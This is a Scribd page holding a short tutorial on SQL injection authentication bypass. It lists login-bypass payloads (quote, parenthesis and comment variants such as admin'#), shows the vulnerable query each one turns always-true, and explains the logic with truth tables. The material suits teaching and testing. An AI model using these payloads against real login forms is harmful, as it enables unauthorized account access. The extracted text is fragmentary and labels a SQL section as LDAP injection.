Scribd Logo
Upload

Welcome to Scribd!

  • SQLinjection - Authentication Bypass

    Uploaded by

    dawasov843
    21 views3 pages
    This document discusses SQL injection and LDAP injection authentication bypasses, providing examples of how to inject SQL statements using single quotes, double quotes, parentheses, and comments to bypass authentication and access restricted data by manipulating the backend query. Test cases are presented injecting strings into username and password fields to return all user data by making the SQL statement always true.

    Original Description:

    Copyright

    © © All Rights Reserved

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document discusses SQL injection and LDAP injection authentication bypasses, providing examples of how to inject SQL statements using single quotes, double quotes, parentheses, and comments to bypass authentication and access restricted data by manipulating the backend query. Test cases are presented injecting strings into username and password fields to return all user data by making the SQL statement always true.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    21 views3 pages

    SQLinjection - Authentication Bypass

    Uploaded by

    dawasov843
    This document discusses SQL injection and LDAP injection authentication bypasses, providing examples of how to inject SQL statements using single quotes, double quotes, parentheses, and comments to bypass authentication and access restricted data by manipulating the backend query. Test cases are presented injecting strings into username and password fields to return all user data by making the SQL statement always true.

    Copyright:

    © All Rights Reserved
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as pdf or txt
    of 3

    SQLinjection - Authentication Bypass

    'or''='

    "or""="

    ')or(''='

    ")or(""="

    username=admin
    pwd=admin123

    SELECT * FROM users WHERE username='$usrinp' AND password='$pwdinp'

    SELECT * FROM users WHERE username='admin' AND password='admin123'

    T
    AND T

    AND

    T T T
    T F F
    F T F
    F F F

    'or''='

    SELECT * FROM users WHERE username=''or''='' AND password=''OR''=''

    F OR T =T AND F
    OR T =T

    OR

    T T T
    T F T
    F T T
    F F F
    TEST CASE 1:

    SELECT * FROM users WHERE username='$usrinp' AND password='$pwdinp'

    'or''='

    TEST CASE 2:

    SELECT * FROM users WHERE username="$usrinp" AND password="$pwdinp"

    "or""="

    LDAP Injection - Authentication Bypass

    TEST CASE 3:

    SELECT * FROM users WHERE username=('$usrinp') AND


    password=('$pwdinp')

    ')or(''='

    TEST CASE 4:

    SELECT * FROM users WHERE username=("$usrinp") AND


    password=("$pwdinp")

    ")or(""="

    #comment
    -- comment

    admin'#

    'or''=''#
    "or""=""#
    ')or(''='')#
    ")or(""="")#
    SELECT * FROM users WHERE username='admin'#' AND password='$pwdinp'

    You might also like